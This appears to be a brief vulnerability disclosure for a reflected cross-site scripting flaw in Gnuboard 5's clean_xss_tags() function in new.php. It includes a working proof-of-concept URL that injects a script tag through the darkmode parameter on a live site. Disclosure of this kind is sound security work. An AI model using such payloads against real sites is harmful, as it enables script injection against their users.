cross site scripting - reflected in gnuboard/gnuboard5
Aug 11th 2022
The reflected XSS vulnerability occurs to a flaw in the clean_xss_tags() function called in new.php of Gnuboard 5.
- Open the https://sir.kr/bbs/new.php?darkmode=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E
- payload executing
Through this vulnerability, an attacker is capable to execute malicious scripts.